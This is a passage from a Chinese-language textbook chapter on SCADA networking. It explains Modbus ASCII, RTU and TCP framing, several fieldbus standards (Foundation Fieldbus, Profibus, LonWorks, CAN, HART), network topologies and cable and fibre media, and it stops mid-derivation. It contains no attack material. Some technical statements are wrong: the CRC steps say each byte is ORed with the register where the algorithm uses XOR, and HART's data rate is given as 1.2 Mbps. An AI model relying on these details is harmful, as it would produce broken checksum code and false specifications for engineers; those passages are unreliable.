协议的增强型Modbusplus(MB+)网络,可连接32个节点,利用中继器可扩至64个节点。这种Modicon 公司最先倡导的通信协议,经过大多数公司的实际应用,逐渐被认可,成为一种事实上的标准协议,只要按照这种协议进行数据通信或传输,不同的系统就可以通信。 Modbus协议定义了一种公用的消息结构,而不管它们是经过何种网络进行通信的。它制定了信息帧的格式,描述了服务端请求访问其他设备等客户端的过程,如怎样回应来自其他设备的请求,以及怎样侦测错误并记录。通过Modbus 协议在网络上通信时,必须清楚每个控制器的设备地址,根据每个设备地址来决定要产生何种行动。如果需要回应,控制器将生成反馈信息并按照Modbus 协议发出。标准的Modbus 设备是使用RS-232 串行接口,它定义了连接口的针脚、电缆、信号位、传输波特率、奇偶校验。控制器能直接或间接(经过Modem拨号)组网。控制器通信使用主—从技术,即只有一个设备(主设备)能初始化传输(查询)。其他设备(从设备)根据主设备查询提供的数据做出相应反应。典型的主设备有计算机主机和可编程仪表。典型的从属设备有可编程控制器、各种仪表等。 2. 主从查询—回应 Modbus 协议建立了主设备查询的格式:设备(或广播)地址、功能代码、所有要发送的数据和错误检测域。从设备回应消息也由Modbus 协议构成,包括确认要行动的域、要返回的数据和错误检测域。如果在消息接收过程中发生错误,或从设备不能执行其命令,从设备将建立错误消息并把它作为回应发送出去。图2.16所示为主从查询—回应过程,查询消息中的功能代码告之被选中的从设备要执行何种功能。数据段包含了从设备要执行功能的任何附加信息。例如功能代码03是要求从设备读保持寄存器并返回它们的内容。数据段必须包含要告之从设备的信息:从何寄存器开始读及要读的寄存器数量。错误检测域为从设备提供了一种验证消息内容是否正确的方法。如果从设备产生正常的回应,在回应消息中的功能代码是在查询消息中的功能代码的回应。数据段包括了从设备收集的数据:寄存器值或状态。如果有错误发生,功能代码将被修改以用于指出回应消息是错误的,同时数据段包含了描述此错误信息的代码。错误检测域允许主设备确认消息内容是否可用。 在实际的应用过程中,为了解决某一个特殊问题,人们喜欢自己修改Modbus协议来满足自己的需要(事实上,开发人员经常使用自己定义的协议来通信,虽然这不太规范)。更为普通的用法是,少量修改协议,但将协议格式附在软件说明书一起,或直接放在帮助中,这样就方便了用户的通信编程或设置。 2.4.2 常用Modbus 协议 1.Modbus 协议消息帧的定义 常用的Modbus 通信协议有两种报文帧格式:一种是Modbus ASCII;另一种是Modbus RTU。一般来说,通信数据量少时采用Modbus ASCII协议,通信数据数据量大而且是二进制数值时,多采用Modbus RTU协议。 1)ASCII方式 如表2.3所示,当服务端设为在Modbus 网络上以ASCII(美国标准信息交换代码)模式通信,在消息中的每个8位的字节都作为两个ASCII 字符发送。这种方式的主要优点是字符发送的时间间隔可达到1s而不产生错误。 表2.3 ASCII 方式数据帧的格式 在ASCII模式下,消息帧以字符冒号“:”(ASCII码3AH)开始,以回车换行符结束(ASCII 码0DH,0AH)。其他区域可以使用的传输字符是十六进制的0~9,A~F。在传输过程中,网络上的设备不断侦测“:”字符,当有一个冒号接收到时,每个设备都解码下个域(地址域)来判断是否发给自己的。 2)RTU方式 如表2.4所示,当控制器设为在Modbus网络上以RTU(远程终端单元)模式通信,在消息中的每个8位的字节包含两个4位的十六进制字符。这种方式的主要优点是,在同样的波特率下,可比ASCII方式传送更多的数据。 表2.4 RTU方式数据帧的格式 使用RTU模式,消息帧的发送至少要以3.5个字符时间的停顿间隔开始。在网络波特率下是非常容易实现多样的字符时间(起始位的T1-T2-T3-T4)。网络设备不断地侦测网络总线,包括停顿间隔时间内。当第一个域(地址域)接收到后,每个设备都进行解码以判断是否发给自己的。在最后一个传输字符之后,至少用3.5个字符时间的停顿标定消息的结束。一个新的消息可在此停顿后开始。整个消息帧必须作为一连续的流传输。如果在帧完成之前有超过1.5个字符时间的停顿时间,接收设备将刷新不完整的消息并假定下一字节是一个新消息的地址域。同样地,如果一个新消息在小于3.5个字符时间内接着前个消息开始,接收的设备将认为它是前一消息的延续。但这将导致一个错误,因为在最后的CRC域的值不可能是正确的。 数据的效验的方式有两种,LRC(纵向冗余校验)和CRC(循环冗余校验)。 LRC校验比较简单,它在ASCII协议中使用,检测了消息域中除开始的冒号及结束的回车换行号外的内容。它仅仅是把每一个需要传输的数据按字节叠加后取反加1即可。 CRC是先调入一个数值是全“1”的16位寄存器,然后调用一过程将消息中连续的各当前寄存器中8位字节的值进行处理。仅每个字符中的8位数据对CRC有效,起始位和停止位以及奇偶校验位均无效。CRC产生过程中,每个8位字符都单独和寄存器内容相或(OR),结果向最低有效位方向移动,最高有效位以0填充。LSB被提取出来检测,如果LSB为1,寄存器单独和预置的值相或,如果LSB为0,则不进行。整个过程要重复8次。在最后一位(第8 位)完成后,下一个8位字节又单独和寄存器的当前值相或。最终寄存器中的值,是消息中所有的字节都执行之后的CRC值。 2.Modbus/TCP Modbus/TCP是Modbus协议族中的新成员,它是建立在标准的TCP协议基础上的Modbus 协议扩展。借助于TCP对Internet的支持,可以实现PLC、I/O模块和其他控制设备的透明连接,为工业自动化领域的软硬件开发商提供一个网络时代的设备信息通信标准。由于公布较早并有广泛的应用开发基础,Modbus/TCP协议己经成为工业自动化网络时代的事实标准。Modbus/TCP在支持TCP/IP协议的Intranet或Internet设备上,传递Modbus信息报文。这种协议最常见的使用方式是作为网关连接PLC、I/O模块。目前已经有许多厂商提供控制层的硬件通信网关,可以为不同类型的控制设备的数据通信提供Modbus/TCP通信接口。传统的Modbus数据交换不需要事先申请,并且保证高抗噪声干扰能力,通信双方只需交换少量的维护信息。Modbus/TCP的最典型特征是面向连接。Modbus/TCP在Modbus基础上增加了连接操作,即涵盖数据交换和连接操作。在TCP中,一个连接请求很容易被识别并建立,一个连接可以承载多个独立的数据交换。此外,TCP允许大量的并发连接,连接发起者可以自由选择另外建立一个连接或保持一个长期连接。 Modbus/TCP方式数据帧的格式如表2.5所示,在消息中的每个8位字节包含两个4位的十六进制字符,消息数据长度不能超过256个字符。 表2.5 Modbus/TCP方式数据帧的格式 2.5 现场总线技术 2.5.1 现场总线的体系结构与特点 现场总线原本是指现场设备之间公用的信号传输线。根据IEC/ISA定义,现场总线是连接智能现场设备和自动化系统的数字式、双向传输、多分支的通信网络。在过程控制领域内,它就是从控制室延伸到现场测量仪表、变送器和执行机构的数字通信总线。它取代了传统模拟仪表单一的4~20mA传输信号,实现了现场设备与控制室设备间的双向、多信息交换。控制系统中应用现场总线,一是可大大减少现场电缆以及相应接线箱、端子板、I/O卡件的数量;二是为现场智能仪表的发展提供了必需的基础条件;三是大大方便了自控系统的调试以及对现场仪表运行工况的监视管理,提高系统运行的可靠性。 现场总线将当今网络通信与管理的概念带入控制领域,代表了今后自动化控制体系结构发展的一种方向。2003年4月,IEC 61158第3版现场总线标准正式成为国际标准,规定10种类型的现场总线。 · Type 1 TS61158现场总线。 · Type 2 ControlNet和Ethernet/IP现场总线。 · Type 3 Profibus现场总线。 · Type 4 P-NET现场总线。 · Type 5 FF HSE现场总线。 · Type 6 SwiftNet现场总线(在2007年的IEC 61158 Ed.4被撤销)。 · Type 7 World FIP现场总线。 · Type 8 Interbus现场总线。 · Type 9 FF H1现场总线。 · Type 10 PROFInet现场总线。 根据最新的2007年的IEC 61158第4版本,已经有20种现场总线国际标准,可见标准之多。 现场总线是以ISO的OSI模型为基本框架的,并根据实际需要进行简化了的体系结构系统,它一般包括物理层、数据链路层、应用层、用户层。物理层向上连接数据链路层,向下连接介质。物理层规定了传输介质(双绞线、无线和光纤)、传输速率、传输距离、信号类型等。在发送期间,物理层对来自数据链路层的数据流进行编码并调制。在接收期间,它用来自介质的控制信息将接收到的数据信息实现解调和解码,并送给链路层。数据链路层负责执行总线通信规则,处理差错检测、仲裁、调度等。应用层为最终用户的应用提供一个简单接口,它定义了如何读、写、解释和执行一条信息或命令。用户层实际上是一些数据或信息查询的应用软件,它规定了标准的功能块、对象字典和设备描述等一些应用程序,给用户一个直观简单的使用界面。现场总线除具有一对N结构、互换性、互操作性、控制功能分散、互连网络、维护方便等优点外,还具有如下特点: (1)网络体系结构简单:其结构模型一般仅有4层,这种简化的体系结构具有设计灵活、执行直观、价格低廉、性能良好等优点,同时还保证了通信的速度。 (2)综合自动化功能:把现场智能设备分别作为一个网络节点,通过现场总线来实现各节点之间、节点与管理层之间的信息传递与沟通,易于实现各种复杂的综合自动化功能。 (3)容错能力强:现场总线通过使用检错、自校验、监督定时、屏蔽逻辑等故障检测方法,大大提高了系统的容错能力。 (4)提高了系统的抗干扰能力和测控精度:现场智能设备可以就近处理信号并采用数字通信方式与主控系统交换信息,不仅具有较强的抗干扰能力,而且其精度和可靠性也得到了很大的提高。 现场总线的这些特点,不仅保证了它完全可以适应目前工业界对数字通信和传统控制的要求,而且为综合自动化系统的实施打下了基础。 在现场总线系统中,人们通常按通信帧的长短,把数据传输总线分为传感器总线、设备总线和现场总线。传感器总线的通信帧长度只有几个或十几个数据位,属于位级的数据总线,典型的传感器总线就是ASI总线。设备总线的通信帧长度一般为几个到几十个字节,属于字节级的总线,如CAN总线就属于设备级总线。 2.5.2 几种有影响的现场总线 1.基金会现场总线FF(Foundation Fieldbus) 基金会现场总线是国际上几家现场总线经过激烈竞争后形成的一种现场总线,由现场总线基金会推出,已经被列入IEC 61158标准。FF是为适应自动化系统,特别是过程自动化系统在功能、环境与技术上的需求而专门设计的。FF适合在流程工业的生产现场工作,能适应安全防爆的要求,还可以通过通信总线为现场设备提供电源。为了适应离散过程与间歇过程控制的要求,近年来还扩展了新的功能块。 FF核心技术之一是数字通信。为了实现通信系统的开放性,其通信模型参照了ISO的OSI模型,并在此基础上根据自动化系统的特点进行演变后得到的。FF的参考模型具备ISO/OSI参考模型中的三层,即物理层、数据链路层和应用层,并按照现场总线的实际要求,把应用层划分为两个子层—总线范围子层与总线报文规范子层。此外,FF增加了用户层,因此可以将通信模型看作是四层。物理层规定了信号如何发送;数据链路层规定如何在设备间共享网络和调度通信;应用层规定了在设备间交换数据、命令、事件信息以及请求应答中的信息格式;用户层用于组成用户所需要的应用程序,如规定标准的功能块、设备描述,实现网络管理、系统管理等。 FF总线提供了H1和H2两种物理层标准。H1是用于过程控制的低速总线,传输速率为31.25Kbps,传输距离为200m、450m、1200m、1900m四种,支持本质安全设备和非本质安全总线设备。H2为高速总线,其传输速率为1Mbps(此时传输距离为750m)或2.5Mbps(此时传输距离为500m)。H1和H2每段节点数可达32个,使用中继器后可达240个,H1和H2可通过网桥互连。 2. 过程现场总线Profibus Profibus是Process Fieldbus的缩写,是由Siemens公司提出并极力倡导,已先后成为德国国家标准DIN19245、欧洲标准EN50170和国际标准之一,是一种开放而独立的总线标准,在制造业自动化、流程工业自动化、楼宇自动化、交通监控、电力自动化等领域得到广泛应用。Profibus传输速度可在9.6Kbps~12Mbps范围内选择且当总线系统启动时,所有连接到总线上的装置应该被设成相同的速度。 Profibus-DP(Decentralized Periphery)和Profibus-PA(Process Automation )是目前最常用的两种类型现场总线。它们主要使用主-从方式,通常周期性地与总线设备进行数据交换。Profibus的通信参考模型是根据ISO 7498国际标准,以开放式系统互联网络OSI作为参考模型的。 (1)Profibus-DP—这是一种高速低成本通信,用于设备级控制系统与分散式I/O的通信。基本特性同FF的H2总线,可实现高速传输,适用于分散的外部设备和自控设备之间的高速数据传输,用于连接Profibus-PA和加工自动化。定义了第一、二层和用户接口。第三层到第七层未加描述。用户接口规定了用户及系统以及不同设备可调用的应用功能,并详细说明了各种不同Profibus-DP设备的设备行为。Profibus-DP采用RS-485作为物理层的连接接口,网络的物理连接采用屏蔽单对双绞铜线的A型电缆。 (2)Profibus-PA—专为过程自动化设计,可使传感器(变送器)和执行机构连在一根总线上。其基本特性同FF的H1总线,十分适合防爆安全要求高、通信速度低的过程控制场合,可以提供总线供电。该协议定义了第一、二、七层,第三层到第六层未加描述。Profibus-PA采用IEC61158-2标准,通信速率固定为31.25Kbps。数据传输采用扩展的Profibus-DP协议。 3.LonWorks LonWorks是Echelon公司开发的数字通信协议,是一种全面的测控网络,采用数字式、双向多分支结构的组网方式。LonWorks控制网络的基本组成单元是网络节点,网络节点具备独立的工作能力,使测控设备具备了数字计算和数字通信能力,通过多种通信介质以一个公共的、基于消息的控制协议与其他网络节点通信,通信网络是Pear to Pear对等通信形式,以提高信号的测量、传输和控制精度。 LonWorks以其独特的技术优势,将计算机技术、网络技术和控制技术融为一体,在控制系统中引入了网络的概念,可以方便的实现更高效、更灵活、更易于维护和扩展分布式测控网络系统,其独特性具体表现为: (1)协议的开放性和互操作性:LonWorks通信协议LonTalk支持OSI的所有七层模型,任何制造商的产品都可以实现互操作,而且对任何用户都是对等、开放的。 (2)网络的兼容性:可采用通信介质包括双绞线、电力线、无线、红外线、光缆等,并且支持多种介质在同一网络中混合使用。 (3)网络拓扑的多样性:支持总线形、星形、环形和自由形式等网络拓扑,也可以自由组合。 (4)网络节点的独立性:基于功能强大的Neuron芯片设计的网络节点既能独立管理网络通信,同时也具备输入、输出以及控制等能力,增强了网络控制系统的可靠性。 (5)强大的开发工具平台:LonBuilder和NodeBuilder帮助用户短期内完成网络节点的开发和网络建立。 (6)专用的网络操作系统:LNS(LonWorks Network Services)是用于LonWorks技术开发和应用的网络操作系统,采用面向对象的管理方法,与LON网构成Client/Server结构,为网络管理和HMI建立提供了有效的手段。 LonWorks核心技术包括LonWorks节点和路由器、LonTalk协议、LonWorks收发器、以及节点开发工具等。 LonTalkLon协议是LonWorks技术的核心。该协议提供一套通信服务,装置中的应用程序能在网上对其他装置发送和接收报文而无需知道网络拓扑、名称、地址或其他装置的功能。LonTalk协议能有选择地提供端到端的报文确认、报文证实和优先级发送功能,以便设定有界事务处理时间。对网络管理业务的支持使远程网络管理工具能通过网络和其他装置相互作用,包括网络地址和参数的重新配置,下载应用程序,报告网络问题和节点应用程序的起始、终止和复位。 4. CAN CAN是Controller Area Network的缩写,中文称为控制局域网。它是德国Bosch公司在1986年为解决现代汽车中众多测量与控制部件之间的数据交换而开发的一种串行数据通信总线,已成为ISO国际标准ISO 11898。虽然该技术最初是服务于汽车工业,但由于其在技术与性价比方面的优势,在众多领域得到了应用。 CAN总线规范了任意两个CAN节点之间的兼容性,包括电气特性及数据解释协议。CAN协议分为两层:物理层和数据链路层。物理层决定了实际传送过程中的电气特性,在同一网络中,所有节点的物理层必须保持一致,但可以采用不同方式的物理层。CAN的数据链路层功能包括帧组织形式,总线仲裁和检错、错误报告及处理,确认哪个信息要发送,确认接收到的信息以及为应用层提供接口等。 CAN在可靠性、实时性与灵活性方面具有独特的优势,主要表现在以下7个方面: (1)CAN总线网络上的任意一个节点均可在任意时刻主动向网络上的其他节点发送信息,而不分主从。 (2)CAN采用载波监听多路访问、逐位仲裁的非破坏性总线仲裁技术。一是先听再说,二是当多个节点同时向总线发送报文而引起冲突时,优先级较低的节点会主动地退出发送,而最高优先级的节点可不受影响地继续传输数据,从而大大节省了总线仲裁时间。 (3)通信灵活,可方便地构成多机备份系统及分布式监测、控制系统。 (4)网络上的节点可分成不同的优先级以满足不同的实时要求。采用非破坏性总线仲裁技术,当两个节点同时向网络上传送信息时,优先级低的节点主动停止数据发送,而优先级高的节点可不受影响地继续传输数据。 (5)具有点对点,一点对多点及全局广播传送接收数据的功能。通信距离最远可达10km(速率为5Kbps),在400m通信距离内,通信速率最高可达1Mbps。网络节点数实际可达110个。 (6)每一帧的有效字节数为8,这样传输时间短,受干扰的概率低;每帧信息都有CRC校验及其他检错措施,数据出错率极低,可靠性极高。在传输信息出错严重时,节点可自动切断它与总线的联系,以使总线上的其他操作不受影响。 (7)通信介质可采用双绞线、同轴电缆或光纤。 5. HART HART(Highway Addressable Remote Transducer,可寻址远程传感器)协议是由位于美国Austin的通信基金会制定的总线标准。它可使用工业现场广泛存在的4~20mA模拟信号导线传送数字信号。HART最早是美国Rosement公司于1985年推出的一种用于现场智能仪表和控制室设备之间的通信协议,它采用半双工的通信方式,属于模拟系统向数字系统转变过程中过渡性产品,因而适应了市场的需求,在全美国范围得到了较快发展,并已成为全球过程自动化仪表的工业标准和使用最广泛的总线设备。目前多数过程自动化仪表都支持HART通信,多数DCS的过程I/O接口卡件也支持与仪表的HART通信。 HART协议采用基于Bell202标准的FSK频移键控信号,在低频的4~20mA模拟信号上叠加幅度为0.5mA的音频数字信号进行双向数字通信,数据传输速率为1.2Mbps。由于FSK信号的平均值为0,不影响传送给控制系统模拟信号的大小,保证了与现有模拟系统的兼容性。在HART协议通信中主要的变量和控制信息由4~20mA传送,在需要的情况下,另外的测量、过程参数、设备组态、校准、诊断信息通过HART协议访问。 HART协议参考 ISO/OSI(开放系统互连模型 ),采用了它的简化三层模型结构,即第一层物理层,第二层数据链路层和第七层应用层。物理层规定了信号的传输方法、传输介质,以实现模拟通信和数字通信同时进行而又互不干扰。通信介质的选择视传输距离长短而定。通常采用双绞同轴电缆作为传输介质时,最大传输距离可达到1500m。线路总阻抗应在230~1100Ω之间。数据链路层规定了HART帧的格式,实现建立、维护、终结链路通讯功能。HART协议根据冗余检错码信息,采用自动重复请求发送机制,消除由于线路噪音或其他干扰引起的数据通讯出错,实现通讯数据无差错传送。现场仪表要执行HART指令,操作数必须合乎指定的大小。每个独立的字符包括1个起始位、8个数据位、1个奇偶校验位和一个停止位。由于数据的有无和长短并不恒定,所以HART数据的长度也是不一样的,最长的HART数据包含25个字节。 应用层为HART命令集,用于实现 HART指令。按命令方式工作,有3类HART命令:第一类称为通用命令,这是所有设备都理解、都执行的命令;第二类称为一般行为命令,所提供的功能可以在许多现场设备(尽管不是全部)中实现,这类命令包括最常用的现场设备的功能库;第三类称为特殊设备命令,以便于工作在某些设备中实现特殊功能,这类命令既可以在基金会中开放使用,又可以为开发此命令的公司所独有。在一个现场设备中通常可发现同时存在这3类命令。 HART采用统一的设备描述语言DDL。现场设备开发商采用这种标准语言来描述设备特性,由HART基金会负责登记管理这些设备描述并把它们编为设备描述字典,主设备运用DDL技术来理解这些设备的特性参数而不必为这些设备开发专用接口。但由于这种模拟数字混合信号制,导致难以开发出一种能满足各公司要求的通信接口芯片。HART能利用总线供电,可满足本质安全防爆要求,并可组成由手持编程器与管理系统主机作为主设备的双主设备系统。 2.6 SCADA系统中的网络技术 SCADA技术的快速发展及其广泛的应用与网络和通信技术密切相关,没有现代的网络和通信技术,很难想象如何实现分布范围极广、极其分散的众多设备的远程监控。可以毫不夸张地说,现代的主要通信与网络技术在各种类型的SCADA系统中几乎都得到了应用,这也是SCADA系统的重要特色,即通信手段的多样性、先进性与复杂性。本节主要对SCADA系统相关的网络技术做介绍。 2.6.1 通信网络概述 通信网络是用各种通信手段和一定的连接方式,将终端设备、传输系统、交换系统等连接起来的通信整体,或由一些彼此关联的分系统组成的完整的通信系统。通信网络的基本构成要素是终端设备、传输链路、转接交换设备及接入部分。除了这些硬件设备外,为了保证网络能正确合理的运行,用户间快速接续,并有效地相互交换信息,达到通信质量一致,运转可靠性和信息透明性等要求,还必须有管理网络运行的软件,如标准、信令、协议等。 通信网络的分类方法很多,根据不同的划分标准,同一个通信网络可以划分为不同的类。如按照能实现的业务种类不同,通信网可以划分为电话通信网、计算机通信网、数据通信网、广播电视网以及综合业务数字网;按照网络所服务的范围不同,通信网可以分为本地网、长途网及国际网;按照传输介质的不同,通信网可以分为微波通信网、光纤通信网及无线通信网;按照拓扑结构形式,通信网可以分为总线形、环形、星形、网形和复合形等基本结构形式。 2.6.2 计算机网络拓扑结构与分类 1.网络的拓扑结构 从拓扑学的观点看计算机系统,抽象出网络系统的具体结构,即成为计算机网络的拓扑结构,网络的拓扑结构就是网络中节点的互连形式。基本的网络拓扑结构有四种,分别是星形、环形、总线形和树形。当然,在实际应用中,可以根据需要,把基本的拓扑结构组合成更为复杂网络。 1)星形拓扑结构 星形拓扑结构中,所有节点通过传输介质与中心节点相连,全网由中心节点执行交换和控制功能,任意两个节点之间通信都要通过中心节点转发,典型的星形拓扑结构如图2.17所示。星形拓扑结构简单,便于集中控制和管理,建网容易,故障容易隔离和定位,网络延迟较小;但网络的中心节点负荷过重,而其他节点通信负荷较轻,如果中心节点故障,则整个网络失效。星形拓扑结构适合用于终端密集的地方。交换式以太网和双绞线以太网都是星形拓扑结构。 2)环形拓扑结构 与星形结构不同,环形拓扑结构属非集中控制方式。网络上每个节点无主、从关系,各个节点由通信线路首尾相连成一个闭合的环路,如图2.18所示。环形拓扑中,数据通常单向流动,每个节点按位转发的数据可用令牌来协调各个节点的发送,任意两个节点都可实现通信。IBM公司的Token Ring(令牌环)及现代的高速FDDI网络都是环形结构的网络。 由于环形网络信息通常单向流动,当网络中一个设备或传输介质出现故障时,整个网络会瘫痪,因此,在对可靠性要求较高的场合常采用双环。 3)总线形拓扑结构 总线形拓扑结构是将若干个节点设备连接到一条总线上,共享一条传输介质,如图2.19所示。总线形拓扑结构采用广播通信方式,所有节点都可通过总线发送或接收数据,但一段时间内只允许一个节点利用总线发送数据。总线形拓扑结构简单灵活,便于扩展,易于布线。总线网络可靠性较高,局部的节点出现故障不会导致整个网络瘫痪。因为总线上的所有节点都可以接收到总线上的信息,因此易于控制信息流动。但由于采用一条公用的总线通信,因此若总线上的任一点出现故障,会造成整个网络瘫痪。 4)树形拓扑结构 树形拓扑结构将节点按层次来连接,是一种具有顶点的分层或分级结构,如图2.20所示。一般来讲,越靠近根的节点,其处理能力越强,数据处理、命令控制等都由顶部节点完成。树形拓扑是总线形拓扑的扩展形式,可以在一条总线的终端通过接线盒扩展成树形拓扑。树形拓扑是适应性很强的一种拓扑,适用范围广,例如对网络设备的数量、传输速率和数据类型等没有太多的限制,可以达到很高的带宽。 2.计算机网络的分类 对网络的分类可以按照不同的标准,从不同的角度来划分。对于SCADA系统来说,按照网络覆盖范围的大小来分类比较合适,通常可以分为局域网、城域网和广域网三大类。 1)局域网 局域网指在有限地理范围内构成的覆盖面积相对较小的计算机网络,传输距离在数百米左右,节点位置通常在室内。网络拓扑结构通常用简单的总线形、环形或星形,传输距离短,传输延迟低,传输速率可达到10~1000Mbps。对一个较大规模的SCADA系统来说,上位机所在的监控中心网络系统就属于典型的局域网,网络中主要包括SCADA服务器、I/O服务器、数据服务器、Web服务器、操作站等设备。当然,若下位机现场测控任务复杂,也可以将多个下位机组成局域网来协同完成现场测控任务。 2)城域网 城域网覆盖范围是一个城市,传输距离在10~150km之间,目前多数使用光纤、微波等作为传输介质,采用树形拓扑结构,传输速率在56Kbps~45Mbps。城市泵站、煤气、自来水等公共设施的监控系统的通信网络就属于城域网。这些系统中,现场监控设备分布在城市的各个角落,分布范围较广,而监控中心会设在城市中心。 3)广域网 广域网是一种跨城市、甚至跨国家的网络,其主要特点是进行远距离(几十到几千公里)的通信。广域网通常含有复杂的分组交换系统,涉及电信通信等方式。广域网传输延迟较大,信道容量较低,数据传输速率在9.6Kbps~45Mbps之间。如中国教育网和Internet都是广域网。在大型SCADA系统中,如我国的西气东输、南水北调等特大型工程的通信系统就属于广域网。若SCADA系统配置了Web服务器,远程客户可以通过浏览器来实现远程的监控,则该系统又具有了广域网的特性。 2.6.3 网络传输介质 传输介质是数据通信的物理通路,是信号从发送设备到接收设备传递所经过的媒介,是通信系统中传送信息的载体,也是通信系统重要的硬件设备之一。 SCADA系统中,通常采用多种类型的传输介质,既有有线介质,如双绞线、同轴电缆、光纤等,也有无线传输介质,如电磁波、红外线、微波。 1.有线传输介质 1)双绞线 双绞线(Twisted Pair,TP)是模拟数据及数字数据信号传输最通用的传输介质。双绞线采用了一对互相绝缘的导体以螺旋形式相互缠绕而成的,线芯一般是铜线。将两根导线缠绕在一起,可以使它们发射和接收的电磁干扰相互抵消。双绞线既可以传输模拟信号,也可以传输数字信号,其带宽取决于线芯的粗细和传输的距离。当传输模拟信号时,最大传输距离为15km;传输数字信号时,最大传输距离为1~2km。双绞线的截面直径在0.38~1.42mm之间,典型的直径是1mm。图2.21所示为一段双绞线及其颜色对应关系。 双绞线按其电气特性而进行分级或分类,一般分为屏蔽双绞线(Shielded Twisted Pair,STP)与非屏蔽双绞线(Unshielded Twisted Pair,UTP)。屏蔽双绞线在双绞线与外层绝缘封套之间有一个金属屏蔽层。屏蔽层可减少辐射,防止信息被窃听,也可阻止外部电磁干扰的进入,使屏蔽双绞线比同类的非屏蔽双绞线具有更高的传输速率。但由于成本、标准等原因,屏蔽双绞线使用的比较少。 常用的双绞线包括3类线和5类线。3类线是由两根拧在一起的线构成,一般在塑料外壳里有4对这样的线,外壳起到保护和约束的作用;5类双绞线比3类双绞线拧得更密、更绝缘,这使得它传输信号的距离更长,传输质量更好。局域网中最常用的双绞线一般都是非屏蔽的5类4对(8根导线)的电缆线,这种电缆线的传输速率可达到100Mbps。超5类双绞线也是非屏蔽双绞线,与5类双绞线相比,具有衰减小、串扰少、时延误差小等特点,超5类线主要用于千兆位以太网。 与其他传输介质相比,双绞线在传输距离,信道宽度和数据传输速度等方面均受到一定限制,但价格较为低廉。 2)光纤 光纤是一种光传输介质,是光导纤维的简称。它是一种能够传导光信号的极细而柔软的传输介质。光纤由光纤芯和包层两部分组成,如图2.22所示。纤芯与包层是两种光学性质不同的物质。其中纤芯是光的通路,包层由折射率比纤芯低的玻璃纤维组成,其作用是将光线反射到纤芯上。纤芯通常是由石英玻璃制成的横截面积很小的双层同心圆柱体,它质地脆,易断裂,因此需要外加一保护层,这种在外层加了保护套的光纤就成为实际使用的光缆。光缆和同轴电缆相似,只是没有网状屏蔽层。 光纤的传输原理是:在两种折射率不同的界面上,当光从折射率高的界面射入折射率低的界面时,只要入射角大于临界值,就会发生全反射现象,能量将不受损失,其中包层起到了防止光线在传输过程中衰减的作用。 光纤传输原理如图2.23所示。由于光纤只能传输光信号。因此光纤通信系统包括光发射机、光纤和光接收机。在发送端,先将电信号转换为光信号后才能通过光纤来传输;在接收端,由光检测器把接收到的光信号还原为电信号。光源采用两种不同的发光管:多模光纤对使用较为便宜的发光二极管LED,而单模光纤多使用较为昂贵的是半导体激光二极管ILD。光检测器是一个光电二极管,目前使用的是两种固态器件:发光二极管PIN检测器和雪崩光电二极管APD检测器。发送端与接收端之间的光信号在光纤中传输。由于光纤具有单向传输性,因此,要实现双向通信,光纤必须是成对使用,一根用于发送数据,另一根用于接收数据。 根据传输点模数分类,可以把光纤分为单模光纤(Single Mode Fiber)和多模光纤(Multi Mode Fiber)。单模光纤的纤芯直径小于光波波长(10μm),此时光纤就如同一个波导,光在其中没有反射,而沿直线传播。单模光纤传输频带宽,传输容量大,传输距离更远。多模光纤能容纳多条满足全反射条件的光线同时在光纤中传播,光束以波浪式前进。多模光纤芯径大多在50μm以上,包层直径在100~600μm之间。与单模光纤相比,多模光纤的传输性能较差。单模光纤与多模光纤的传输原理如图2.24所示。 根据折射率分类可把光纤分为跳变式光纤和渐变式光纤。跳变式光纤纤芯的折射率和保护层的折射率都是一个常数。在纤芯和保护层的交界面,折射率呈阶梯型变化。渐变式光纤纤芯的折射率随着半径的增加按一定规律减小,在纤芯与保护层交界处减小为保护层的折射率。纤芯折射率的变化近似于抛物线。 光纤传输信号的距离要比同轴电缆或双绞线远得多,它可以在30km的距离内不用中继器而传输,因而它适合长距离通信,且室外布线不需要防雷措施。由于光纤频带很宽,传送速率极高,因而十分适合传输大量的数据。光纤不漏光且难于拼接,这使得它们很难被窃听,安全性很高。光纤十分轻便,架设较容易,且占用空间少。光信号不受电磁干扰或噪声的影响,光波也不互相干扰,因此理论上不存在信号衰减问题。当然,实际使用中,由于弯曲、挤压、杂质、不均匀和对接等原因会造成光纤信号衰减。光纤的主要缺点是价格较高,特别是安装困难。在各种传输介质中,光纤是最难安装的,安装中的任何微小的误差,都可能造成很大的信号衰减,影响通信的正常进行。 随着光纤使用成本的不断降低,其在SCADA系统等各种工控系统的运用也快速增加。如不少企业主干网络会采用环行冗余光纤网络,而SCADA服务器也以光纤接入该网络,以保证较高的数据传输能力和可靠性。专家预计,在下一个10年,光纤将逐步取代双绞线成为将数据传输到桌面计算机的主要传输介质。这也意味着,光纤将会成为SCADA系统主要的有线传输介质之一。 2.无线传输介质 有线传输介质的一个共同特点是必须铺设电缆或光缆,并且对用户来说必须是固定的,不能随意移动。然而,在很多情况下,很难或不可能铺设有线信道,在SCADA系统中情况更是如此。例如油田采油机的监控,这些机器会在荒无人烟的地方,为了监控这些设备而铺设有线介质是不现实的。此外,还有无线通信机站的监控,这些机站会在高山或丛林中,很难通过有线通信的方式实现对它们的监控。因此,在SCADA系统中,特别是人烟稀少、难于到达、测控点极为分散的系统中,无线通信是常用的通信解决方案。无线通信的优点在于信号通过大气传输,不需要铺设任何有线的介质,只要在需要的地方安装信号收发装置即可。 所谓无线传输是指利用在自由空间中传播的电磁波来进行数据传播。当电子运动时,它们产生可以自由传播(甚至在真空中)的电磁波。它是由英国科学家麦克斯韦尔于1865年提出,1887年由德国物理学家赫兹发现的。电磁波每秒振动的次数称为频率,常用f作标记,单位为赫兹(Hz)。两相邻的波峰或波谷间的距离称为波长,用λ表示。在真空中,电磁波的传播速度是恒定的光速(用c表示),与它的频率无关,大约是3×108m/s ,没有任何物体或信号能比光传播得更快。根据式(2-1),即 可以知道:频率越高,波长越短。 由于各波段的传播性能各异,因此可以用于不同的通信系统中。根据如图2.25所示的电磁波谱,中波主要沿地面传播,绕射能力较强,适用于广播和海上通信;短波具有较强的电离层反射能力,适用于环球通信;超短波和微波绕射能力差,可作视距(两个没有障碍的点间,也就是视线距离内)、超视距中继通信。无线电波、微波、红外线和可见光部分都可以通过调节振幅、频率或波的相位来传输信息。紫外线、X射线和伽马射线更好一些,因为其频率更高,但是很难生成和调制,且穿透建筑物的性能不好,对生物也有害。 电磁波可以运载的信息量与它的带宽有关。在目前的技术条件下,可以在较低的频率下以每赫兹编码几个比特来实现,但是在高频下,有些时候可以达到每赫兹40比特。因此,有500MHz带宽的电缆可以获得几Gb/s。 如果式(2-1)对λ求导,可以得到 